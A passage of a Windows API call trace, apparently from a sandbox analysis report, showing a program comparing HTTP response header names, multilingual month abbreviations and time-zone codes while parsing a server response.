cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0102.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0102.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0102.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0102.957] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0102.957] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f0 [0102.957] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0102.958] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x17a)) [0102.958] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0102.958] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x17a)) [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] ResetEvent (hEvent=0x3f0) returned 1 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] ResetEvent (hEvent=0x3f0) returned 1 [0102.958] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x17a)) [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] SetEvent (hEvent=0x3f4) returned 1 [0102.958] SetEvent (hEvent=0x3f0) returned 1 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.958] GetCurrentThreadId () returned 0x1358 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html", cchCount2=9) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html-sandboxed", cchCount2=19) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xhtml+xml", cchCount2=21) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml", cchCount2=15) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-external-parsed-entity", cchCount2=38) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-dtd", cchCount2=19) returned 3 [0102.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=5, lpString2="text/", cchCount2=5) returned 2 [0102.959] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0102.959] GetTickCount64 () returned 0x115b08f [0102.960] GetTickCount64 () returned 0x115b08f [0102.960] GetTickCount64 () returned 0x115b08f [0102.960] GetTickCount64 () returned 0x115b08f [0102.960] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0102.960] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0102.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0102.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0102.960] MultiByteToWideChar (in: CodePage=0x4e4, 